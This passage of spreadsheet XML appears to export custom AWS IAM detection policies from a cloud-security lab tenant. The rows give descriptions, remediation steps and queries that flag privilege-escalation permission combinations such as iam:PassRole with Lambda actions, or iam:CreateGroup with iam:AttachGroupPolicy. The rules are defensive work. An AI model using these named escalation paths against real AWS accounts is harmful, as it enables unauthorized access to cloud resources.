        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3033" t="inlineStr">
        <is>
          <t>2024-09-19 15:49:55</t>
        </is>
      </c>
      <c r="AC3033" t="inlineStr"/>
      <c r="AD3033" t="b">
        <v>0</v>
      </c>
      <c r="AE3033" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3033" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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3" t="inlineStr">
        <is>
          <t>3b6a14f6-8a52-4390-83ed-1c03da99bf34</t>
        </is>
      </c>
      <c r="AI3033" t="inlineStr">
        <is>
          <t>247d4e3a-ee78-4505-bcff-8e9d505f39aa</t>
        </is>
      </c>
      <c r="AJ3033" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3033" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3034">
      <c r="A3034" t="inlineStr"/>
      <c r="B3034" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3034" s="2" t="inlineStr"/>
      <c r="D3034" t="n">
        <v>0</v>
      </c>
      <c r="E3034" t="n">
        <v>60</v>
      </c>
      <c r="F3034" t="n">
        <v>0</v>
      </c>
      <c r="G3034" t="b">
        <v>1</v>
      </c>
      <c r="H30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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3034" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3034" t="inlineStr">
        <is>
          <t>Crap</t>
        </is>
      </c>
      <c r="L3034" t="inlineStr"/>
      <c r="M3034" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3034" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3034" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3034" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3034" t="inlineStr"/>
      <c r="R3034" t="inlineStr"/>
      <c r="S3034" t="inlineStr"/>
      <c r="T3034" t="b">
        <v>0</v>
      </c>
      <c r="U3034" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3034" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3034" t="inlineStr"/>
      <c r="X3034" t="inlineStr"/>
      <c r="Y3034" t="inlineStr"/>
      <c r="Z3034"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'iam' and source.cloud.resource.type = 'user'</t>
        </is>
      </c>
      <c r="AA3034" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3034" t="inlineStr">
        <is>
          <t>2024-09-19 15:49:09</t>
        </is>
      </c>
      <c r="AC3034" t="inlineStr"/>
      <c r="AD3034" t="b">
        <v>0</v>
      </c>
      <c r="AE3034" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3034" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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4" t="inlineStr">
        <is>
          <t>a36e01c7-c8af-4472-af4d-32814048e7c4</t>
        </is>
      </c>
      <c r="AI3034" t="inlineStr">
        <is>
          <t>e67dbd9d-8228-4748-9be0-9a28608ec818</t>
        </is>
      </c>
      <c r="AJ3034" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3034" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3035">
      <c r="A3035" t="inlineStr"/>
      <c r="B3035" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3035" s="2" t="inlineStr"/>
      <c r="D3035" t="inlineStr"/>
      <c r="E3035" t="inlineStr"/>
      <c r="F3035" t="inlineStr"/>
      <c r="G3035" t="b">
        <v>1</v>
      </c>
      <c r="H30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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3035" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3035" t="inlineStr">
        <is>
          <t>AWS ECS Task Definition with IAM policy management permissions - Cloned via Automation</t>
        </is>
      </c>
      <c r="L3035" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3035" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3035" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3035" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3035" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3035" t="inlineStr"/>
      <c r="R3035" t="inlineStr"/>
      <c r="S3035" t="inlineStr"/>
      <c r="T3035" t="b">
        <v>0</v>
      </c>
      <c r="U3035" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3035" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3035" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allow ECS task definitions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035"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35" t="inlineStr"/>
      <c r="Z3035"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'ecs' and source.cloud.resource.type = 'task-definition'</t>
        </is>
      </c>
      <c r="AA3035" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3035" t="inlineStr">
        <is>
          <t>2024-11-12 19:42:35</t>
        </is>
      </c>
      <c r="AC3035" t="inlineStr"/>
      <c r="AD3035" t="b">
        <v>0</v>
      </c>
      <c r="AE3035" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3035" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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5" t="inlineStr">
        <is>
          <t>d29c7375-0273-4b1c-997a-8263b09445fc</t>
        </is>
      </c>
      <c r="AI3035" t="inlineStr">
        <is>
          <t>c89882d6-ed8e-4e95-931a-9f4dd2c6ff74</t>
        </is>
      </c>
      <c r="AJ3035" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3035" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3036">
      <c r="A3036" t="inlineStr"/>
      <c r="B3036" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3036" s="2" t="inlineStr"/>
      <c r="D3036" t="n">
        <v>55</v>
      </c>
      <c r="E3036" t="n">
        <v>255</v>
      </c>
      <c r="F3036" t="n">
        <v>0</v>
      </c>
      <c r="G3036" t="b">
        <v>1</v>
      </c>
      <c r="H30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36" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3036" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3036" t="inlineStr">
        <is>
          <t>AWS Users and Machine Identities with IAM Data Write permissions are unused for 90 days - BpachauliTest</t>
        </is>
      </c>
      <c r="L3036" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3036" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3036" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3036" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3036" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3036" t="inlineStr"/>
      <c r="R3036" t="inlineStr"/>
      <c r="S3036" t="inlineStr"/>
      <c r="T3036" t="b">
        <v>0</v>
      </c>
      <c r="U3036" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3036" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3036" t="inlineStr">
        <is>
          <t>This policy identifies IAM Users with unused Data Write Permissions. Unused IAM users with "Data Write" permissions pose a severe security risk, even after 90 days of inactivity. Here's why:
- Unrestricted Data Modification: Data Write allows users to modify, alter, or even delete critical data stored in AWS services. An attacker with these permissions could wreak havoc, corrupting or stealing sensitive information.
- Privilege Escalation: Data Write permissions can be used as a stepping stone. Attackers might exploit them to gain further control over your AWS environment and access even more sensitive resources.
Imagine handing someone a key to your vault and then forgetting about it. Unused Data Write access is just as dangerous. Here's how to mitigate the risk:
- Ruthless Review: Ruthlessly identify and disable all unused IAM users with Data Write permissions, regardless of how long they've been inactive.
- Principle of Least Privilege: Grant Data Write permissions only to specific users or machine identities that absolutely require them, and only for the minimum amount of time necessary.
-MFA Requirement: Enforce Multi-Factor Authentication (MFA) for all users with Data Write permissions. This significantly reduces the risk of unauthorized access, even if credentials are compromised.</t>
        </is>
      </c>
      <c r="X3036"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036" t="inlineStr"/>
      <c r="Z3036" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' and action.access.level = 'Data Write' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3036" t="inlineStr">
        <is>
          <t>Bishvesh Pachauli</t>
        </is>
      </c>
      <c r="AB3036" t="inlineStr">
        <is>
          <t>2024-06-17 22:18:57</t>
        </is>
      </c>
      <c r="AC3036" t="inlineStr"/>
      <c r="AD3036" t="b">
        <v>0</v>
      </c>
      <c r="AE3036" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3036" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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36" t="inlineStr">
        <is>
          <t>d95c3e02-694b-4ecb-b0e6-f7fece9945cc</t>
        </is>
      </c>
      <c r="AI3036" t="inlineStr">
        <is>
          <t>5bc1d9da-48a4-4275-9741-0696d0ebc781</t>
        </is>
      </c>
      <c r="AJ3036" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3036" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3037">
      <c r="A3037" t="inlineStr"/>
      <c r="B3037" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3037" s="2" t="inlineStr"/>
      <c r="D3037" t="inlineStr"/>
      <c r="E3037" t="inlineStr"/>
      <c r="F3037" t="inlineStr"/>
      <c r="G3037" t="b">
        <v>0</v>
      </c>
      <c r="H30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37" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3037" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3037" t="inlineStr">
        <is>
          <t>Copy of IAM User with IAM wildcard resource access</t>
        </is>
      </c>
      <c r="L3037" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3037" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3037" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3037" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3037" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3037" t="inlineStr"/>
      <c r="R3037" t="inlineStr"/>
      <c r="S3037" t="inlineStr"/>
      <c r="T3037" t="b">
        <v>0</v>
      </c>
      <c r="U3037" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3037" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3037" t="inlineStr">
        <is>
          <t>This policy identifies IAM User with AWS IAM permissions that contain '*' in the resource section of the policy statement. The policy will identify those '*' only in case using '*' is not mandatory. Ensure that the AWS policies don't have '*' in the resource section of the policy statement.</t>
        </is>
      </c>
      <c r="X3037"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37" t="inlineStr"/>
      <c r="Z3037" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and dest.cloud.resource.name = '*' AND source.cloud.service.name = 'iam' and source.cloud.resource.type = 'user'</t>
        </is>
      </c>
      <c r="AA3037" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3037" t="inlineStr">
        <is>
          <t>2024-11-12 18:57:14</t>
        </is>
      </c>
      <c r="AC3037" t="inlineStr"/>
      <c r="AD3037" t="b">
        <v>0</v>
      </c>
      <c r="AE3037" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3037" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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37" t="inlineStr">
        <is>
          <t>d2dc5611-5784-463d-b16f-06691e3e4b7b</t>
        </is>
      </c>
      <c r="AI3037" t="inlineStr">
        <is>
          <t>33101f7f-54a7-4080-9745-794c3227ac91</t>
        </is>
      </c>
      <c r="AJ3037" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3037" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3038">
      <c r="A3038" t="inlineStr"/>
      <c r="B3038" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3038" s="2" t="inlineStr"/>
      <c r="D3038" t="inlineStr"/>
      <c r="E3038" t="inlineStr"/>
      <c r="F3038" t="inlineStr"/>
      <c r="G3038" t="b">
        <v>0</v>
      </c>
      <c r="H30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38" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3038" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3038" t="inlineStr">
        <is>
          <t>Copy of AWS ECS Task Definition with IAM wildcard resource access</t>
        </is>
      </c>
      <c r="L3038" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3038" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3038" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3038" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3038" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3038" t="inlineStr"/>
      <c r="R3038" t="inlineStr"/>
      <c r="S3038" t="inlineStr"/>
      <c r="T3038" t="b">
        <v>0</v>
      </c>
      <c r="U3038" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3038" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3038"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038" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS ECS Task Definition service
3. Find the role used by the ECS Task Definition instance
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7. Under ''Permissions policies'', find the relevant policy according to the alert details and narrow down the wildcard permissions</t>
        </is>
      </c>
      <c r="Y3038" t="inlineStr"/>
      <c r="Z3038" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and dest.cloud.resource.name = '*' AND source.cloud.service.name = 'ecs' and source.cloud.resource.type = 'task-definition'</t>
        </is>
      </c>
      <c r="AA3038" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB3038" t="inlineStr">
        <is>
          <t>2024-09-13 16:49:57</t>
        </is>
      </c>
      <c r="AC3038" t="inlineStr"/>
      <c r="AD3038" t="b">
        <v>0</v>
      </c>
      <c r="AE3038" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3038" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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38" t="inlineStr">
        <is>
          <t>960fd657-81bb-4ed4-9a52-6c25cd2daae7</t>
        </is>
      </c>
      <c r="AI3038" t="inlineStr">
        <is>
          <t>44d05410-2258-40e8-8499-3b24069b7846</t>
        </is>
      </c>
      <c r="AJ3038" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3038" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3039">
      <c r="A3039" t="inlineStr"/>
      <c r="B3039" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3039" s="2" t="inlineStr"/>
      <c r="D3039" t="inlineStr"/>
      <c r="E3039" t="inlineStr"/>
      <c r="F3039" t="inlineStr"/>
      <c r="G3039" t="b">
        <v>0</v>
      </c>
      <c r="H30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39" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3039" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3039" t="inlineStr">
        <is>
          <t>testdel</t>
        </is>
      </c>
      <c r="L3039" t="inlineStr"/>
      <c r="M3039" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3039" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3039" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3039" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3039" t="inlineStr"/>
      <c r="R3039" t="inlineStr"/>
      <c r="S3039" t="inlineStr"/>
      <c r="T3039" t="b">
        <v>0</v>
      </c>
      <c r="U3039" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3039" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3039" t="inlineStr"/>
      <c r="X3039" t="inlineStr"/>
      <c r="Y3039" t="inlineStr"/>
      <c r="Z3039" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.account = 'pcs-aws-lab01' AND grantedby.cloud.entity.type = 'role'   AND grantedby.cloud.type = 'AWS' AND grantedby.cloud.entity.name = 'sso_pcs_power_user'</t>
        </is>
      </c>
      <c r="AA3039" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3039" t="inlineStr">
        <is>
          <t>2024-09-13 17:14:57</t>
        </is>
      </c>
      <c r="AC3039" t="inlineStr"/>
      <c r="AD3039" t="b">
        <v>0</v>
      </c>
      <c r="AE3039" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3039" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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39" t="inlineStr">
        <is>
          <t>789e46fb-8812-4aa0-864f-e5b2808b1208</t>
        </is>
      </c>
      <c r="AI3039" t="inlineStr">
        <is>
          <t>7b4a02ee-c86a-4d66-a087-ff55cdbb1544</t>
        </is>
      </c>
      <c r="AJ3039" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3039" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3040">
      <c r="A3040" t="inlineStr"/>
      <c r="B3040" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3040" s="2" t="inlineStr"/>
      <c r="D3040" t="inlineStr"/>
      <c r="E3040" t="inlineStr"/>
      <c r="F3040" t="inlineStr"/>
      <c r="G3040" t="b">
        <v>0</v>
      </c>
      <c r="H30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40" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3040" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3040" t="inlineStr">
        <is>
          <t>Copy of AWS role having iam:PassRole and lambda:InvokeFunction permissions attached to EC2 instance</t>
        </is>
      </c>
      <c r="L3040" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3040" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3040" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3040" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3040" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3040" t="inlineStr"/>
      <c r="R3040" t="inlineStr"/>
      <c r="S3040" t="inlineStr"/>
      <c r="T3040" t="b">
        <v>0</v>
      </c>
      <c r="U3040" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3040" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3040" t="inlineStr">
        <is>
          <t>This IAM policy is meticulously designed to address potential vulnerabilities arising from an AWS EC2 instance with specific permissions. The 'iam:PassRole' action, coupled with 'lambda:CreateFunction' and 'lambda:InvokeFunction', holds the potential for adversaries to exploit and escalate privileges. By strategically controlling access to these actions within the 'ec2' service, this policy effectively mitigates the risk of unauthorized creation and manipulation of Lambda functions, safeguarding against potential escalation of privileges and maintaining the integrity of your system.</t>
        </is>
      </c>
      <c r="X304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040" t="inlineStr"/>
      <c r="Z3040" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('iam:PassRole','lambda:CreateFunction', 'lambda:InvokeFunction') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance' AND source.cloud.type = 'AWS'</t>
        </is>
      </c>
      <c r="AA3040" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB3040" t="inlineStr">
        <is>
          <t>2024-09-13 16:53:39</t>
        </is>
      </c>
      <c r="AC3040" t="inlineStr"/>
      <c r="AD3040" t="b">
        <v>0</v>
      </c>
      <c r="AE3040" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3040" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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40" t="inlineStr">
        <is>
          <t>21b6f04e-c081-4ab8-8d80-b0854eed7cdf</t>
        </is>
      </c>
      <c r="AI3040" t="inlineStr">
        <is>
          <t>2544873b-2656-474c-b0ee-be161be727fb</t>
        </is>
      </c>
      <c r="AJ3040" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3040" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3041">
      <c r="A3041" t="inlineStr"/>
      <c r="B3041" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3041" s="2" t="inlineStr"/>
      <c r="D3041" t="n">
        <v>0</v>
      </c>
      <c r="E3041" t="n">
        <v>1</v>
      </c>
      <c r="F3041" t="n">
        <v>0</v>
      </c>
      <c r="G3041" t="b">
        <v>1</v>
      </c>
      <c r="H30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41" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3041" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3041" t="inlineStr">
        <is>
          <t>AWS EC2 instance with the creation of a new Group with attached policy permission_High Custom</t>
        </is>
      </c>
      <c r="L3041" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3041" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3041" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3041" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3041" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3041" t="inlineStr"/>
      <c r="R3041" t="inlineStr"/>
      <c r="S3041" t="inlineStr"/>
      <c r="T3041" t="b">
        <v>0</v>
      </c>
      <c r="U3041" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3041" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3041" t="inlineStr">
        <is>
          <t>With access to iam:CreateGroup', 'iam:AttachGroupPolicy' permissions, an adversary can elevate the access of the EC2 instance, expanding the surface of the attack and granting access to cloud resources with sensitive information.</t>
        </is>
      </c>
      <c r="X3041"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041" t="inlineStr"/>
      <c r="Z3041" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name CONTAINS ALL ('iam:CreateGroup', 'iam:AttachGroupPolicy') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3041" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3041" t="inlineStr">
        <is>
          <t>2024-09-19 15:48:19</t>
        </is>
      </c>
      <c r="AC3041" t="inlineStr"/>
      <c r="AD3041" t="b">
        <v>0</v>
      </c>
      <c r="AE3041" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3041" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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1" t="inlineStr">
        <is>
          <t>653cdbc0-619d-44e1-a071-78bf2426270a</t>
        </is>
      </c>
      <c r="AI3041" t="inlineStr">
        <is>
          <t>d713b788-5ba0-495f-b8bb-e530bec828e2</t>
        </is>
      </c>
      <c r="AJ3041" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3041" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3042">
      <c r="A3042" t="inlineStr"/>
      <c r="B3042" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3042" s="2" t="inlineStr"/>
      <c r="D3042" t="inlineStr"/>
      <c r="E3042" t="inlineStr"/>
      <c r="F3042" t="inlineStr"/>
      <c r="G3042" t="b">
        <v>0</v>
      </c>
      <c r="H30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42" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3042" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3042" t="inlineStr">
        <is>
          <t>GETestIAM-1</t>
        </is>
      </c>
      <c r="L3042" t="inlineStr"/>
      <c r="M3042" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3042" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3042" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3042" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3042" t="inlineStr"/>
      <c r="R3042" t="inlineStr"/>
      <c r="S3042" t="inlineStr">
        <is>
          <t>GEAviation</t>
        </is>
      </c>
      <c r="T3042" t="b">
        <v>0</v>
      </c>
      <c r="U3042" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3042" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3042" t="inlineStr">
        <is>
          <t>Policy for GE Aviation</t>
        </is>
      </c>
      <c r="X3042" t="inlineStr"/>
      <c r="Y3042" t="inlineStr"/>
      <c r="Z3042" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' AND source.cloud.service.name = 'iam' AND grantedby.cloud.entity.type = 'role' AND action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3042" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB3042" t="inlineStr">
        <is>
          <t>2024-09-13 16:51:27</t>
        </is>
      </c>
      <c r="AC3042" t="inlineStr"/>
      <c r="AD3042" t="b">
        <v>0</v>
      </c>
      <c r="AE3042" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3042" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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42" t="inlineStr">
        <is>
          <t>a37b2722-61b6-4d7c-9b2f-de5b784da270</t>
        </is>
      </c>
      <c r="AI3042" t="inlineStr">
        <is>
          <t>37f2a42b-7c87-4405-bef0-37138604902e</t>
        </is>
      </c>
      <c r="AJ3042" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3042" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3043">
      <c r="A3043" t="inlineStr"/>
      <c r="B3043" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3043" s="2" t="inlineStr"/>
      <c r="D3043" t="inlineStr"/>
      <c r="E3043" t="inlineStr"/>
      <c r="F3043" t="inlineStr"/>
      <c r="G3043" t="b">
        <v>0</v>
      </c>
      <c r="H30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43" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3043" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3043" t="inlineStr">
        <is>
          <t>Copy of AWS EC2 instance with IAM write access level</t>
        </is>
      </c>
      <c r="L3043" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3043" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3043" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3043" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3043" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3043" t="inlineStr"/>
      <c r="R3043" t="inlineStr"/>
      <c r="S3043" t="inlineStr"/>
